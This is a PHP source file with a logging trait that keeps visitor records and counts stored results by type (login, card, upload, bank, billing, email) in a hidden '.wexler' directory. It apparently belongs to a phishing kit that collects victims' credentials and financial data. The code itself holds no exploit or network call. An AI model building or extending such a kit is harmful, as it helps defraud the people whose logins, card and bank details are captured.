<?php
trait EPLog {
    public function logAppend($filename, $data) {
        $path = dirname(__FILE__) . '/../../.wexler/log/';
        if (!file_exists($path . $filename)) touch($path . $filename);
        @file_put_contents(dirname(__FILE__) . '/../../.wexler/log/' . $filename, $data . PHP_EOL, FILE_APPEND);
        
    }
    public function logClear($filename) {
        $path = dirname(__FILE__) . '/../../.wexler/log/';
        if (file_exists($path . $filename)) @unlink($path . $filename);
        touch($path . $filename);
        
    }
    public function logCalculateResult() {
        $login = 0;
        $card = 0;
        $upload = 0;
        $bank = 0;
        $billing = 0;
        $email = 0;
        $fname = dirname(__FILE__) . '/../../.wexler/log/result.txt';
        if (file_exists($fname)) {
            foreach (explode("\n", file_get_contents($fname)) as $b => $c) {
                $d = json_decode(trim($c), true);
                if ($d['type'] == "login") $login++;
                if ($d['type'] == "card") $card++;
                if ($d['type'] == "upload") $upload++;
                if ($d['type'] == "bank") $bank++;
                if ($d['type'] == "billing") $billing++;
                if ($d['type'] == "email") $email++;
                
            }
        }
        return [$login, $card, $upload, $bank, $billing, $email];
    }
    public function logCalculateVisitor() {
        $fname = dirname(__FILE__) . '/../../.wexler/log/visitor.txt';
        if (file_exists($fname)) {
            return count(explode("\n", file_get_contents($fname))) - 1;
            
        }
        return 0;
    }
    public function logMessage($a) {
        $this->logAppend('message.txt', json_encode([
            'time' => time(),
            'message' => $a,
            'ip' => $this->ip,
            'useragent' => $_SERVER['HTTP_USER_AGENT'],
            'referrer' => (isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : "n/a"),
            'url' => ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]"),
        ]));
        return $this;
        
    }
}